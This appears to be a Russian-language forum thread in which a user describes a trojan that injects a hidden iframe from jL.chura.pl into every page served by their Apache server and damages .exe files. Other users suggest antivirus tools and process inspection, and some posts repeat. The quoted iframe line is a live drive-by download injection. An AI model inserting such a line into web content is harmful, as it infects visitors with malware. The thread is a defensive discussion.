jl.chura.pl
Троян постоянно во все сайты которые я открываю даже на локалке без инета когда работаю с Апач в каждую открываемую мною страницу добавляет вот такой скрипт.
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
И далее постановка всем известная: то есть с этим iframe вызывает какую то страницу и от туда качает свое гав№
Кроме этого также разрушает все .exe файлы.
Помогите пожалуйста весь инет расшарил. Пока мало кто знаком с этой эпидемией.:eek:
OS: WinXP SP2
Antivirus: NOD32 4.0.24
А ты не пробывал CureIt от Dr.Web'a?
Я раньше частенько им много гадости с компа удалял.
Также посмотри по процессам, что лишнее грохай по очереди и смотри появляется эта шняга или нет. Если найдешь процесс, можно тогда найти кто его запускает, и потом уже грохать вирусняк.
По поводу CureIt: скачай его с не инфицированного компа и закатай на болванку.
P.S. Если, ничего не поможет, то грохай винду (шутка) :D
P.P.S. А в каждой шутке есть доля правды :D
а вот Аваст Хоум Эдишн помог не одному челу =0)
http://download.cnet.com/3001-20_4-10019223.html?spi=4dbf5a7a962839f84995d1ff0cbbd71c
вот прям против этого виря от АВГ
http://www.avg.com/us.virus-removal.ndi-67762
а вот Аваст Хоум Эдишн помог не одному челу =0)
http://download.cnet.com/3001-20_4-10019223.html?spi=4dbf5a7a962839f84995d1ff0cbbd71c
вот прям против этого виря от АВГ
http://www.avg.com/us.virus-removal.ndi-67762
Значит можно смело предположить что сам Аваст и мог замутить такую шнягу:D
А ты не пробывал CureIt от Dr.Web'a?
Я раньше частенько им много гадости с компа удалял.
Также посмотри по процессам, что лишнее грохай по очереди и смотри появляется эта шняга или нет. Если найдешь процесс, можно тогда найти кто его запускает, и потом уже грохать вирусняк.
По поводу CureIt: скачай его с не инфицированного компа и закатай на болванку.
P.S. Если, ничего не поможет, то грохай винду (шутка) :D
P.P.S. А в каждой шутке есть доля правды :D
По ходу моего расследования я наткнулся на странные сервисы в моем винде их перечисляю.
ld12.exe
DPCs.exe
А как можно узнать кто запустил процесс ? ProcessExplorer ом можно ?
ld12.exe
DPCs.exe
А как можно узнать кто запустил процесс ? ProcessExplorer ом можно ?
Да, ProcessExplorer'ом можно узнать, там когда наводишь мышку на процесс, то всплывает подсказка в которой и указан путь к файлу, который запустил процесс.
Также в некоторых firewall'ax есть типа вкладка активные процессы, и там тоже можно проследить.
У меня стоит Outpost Firewall Pro, так я там такие вещи смотрю.
ld12.exe
DPCs.exe
DPCs.exe - это Deferred Procedure Calls. Вобщем, за это не переживай, оно нужно (http://ru.wikipedia.org/wiki/DPC)
Пришлось по ламерски снести винду.
OS: WinXP SP2
йопт. Ты добрая душа - можешь смело просить у сообщества медаль - типа "Почетный спамбот" :)
А ты не пробывал от Dr.Web'a?
Я раньше частенько им много гадости с компа удалял.
Также посмотри по процессам, что лишнее грохай по очереди и смотри появляется эта шняга или нет. Если найдешь процесс, можно тогда найти кто его запускает, и потом уже грохать вирусняк.
По поводу CureIt: скачай его с не инфицированного компа и закатай на болванку.
P.S. Если, ничего не поможет, то грохай винду (шутка) :D
P.P.S. А в каждой шутке есть доля правды :D
Насчет CureIt - хороший совет.
Пытаться удалить вирус (хороший, годный вирус) с компа голыми руками, отслеживая процессы в виндовом таскменеджере? Ну удачи и земля вам пухом, но советы такие давать не стоит людям, которые хотят вылечить вирус. Да и потом - что значит - грохать вирус?Ты думаешь, в таск менеджере есть процесс, называющийся так же как и вирус, и который достаточно прибить, чтобы вирус исчез;)
Сносить винду -- самое последнее средство. Самое.
Пришлось по ламерски снести винду.
не понял... дал тебе ссылки на действующие средства против этого виря. а ты снес винду... мде.
товарищ у меня попробовал (тож такое словил), вылечил.
Пытаться удалить вирус (хороший, годный вирус) с компа голыми руками, отслеживая процессы в виндовом таскменеджере? Ну удачи и земля вам пухом, но советы такие давать не стоит людям, которые хотят вылечить вирус. Да и потом - что значит - грохать вирус?Ты думаешь, в таск менеджере есть процесс, называющийся так же как и вирус, и который достаточно прибить, чтобы вирус исчез;)
Сносить винду -- самое последнее средство. Самое.
Всем привет!
Zorkus, ну во-первых, я не говорил, что есть процесс с таким же названием как вирус. Я просто имел ввиду, что возможно какой-то процесс был запущен вирусняком, и грохать я говорил не вирус, а процессы левые (не системные), и то по очереди, и после каждого грохнутого процесса проверять воспроизводится ли эта проблема. Это обыкновенный анализ, в следствии которого можно найти процесс, запущенный вирусняком. Повторюсь, вирусняки не всегда запускают процессы в ТМ, соответственно это всего лишь один из вариантов поиска виря. И если есть такой процес, то в ProcessExplorer можно посмотреть какой файл его запустил.
Что касается переустановки винды, то там же написано, что это шутка! Хотя многие так и делают, когда уже нету сил гонять вирусняк.
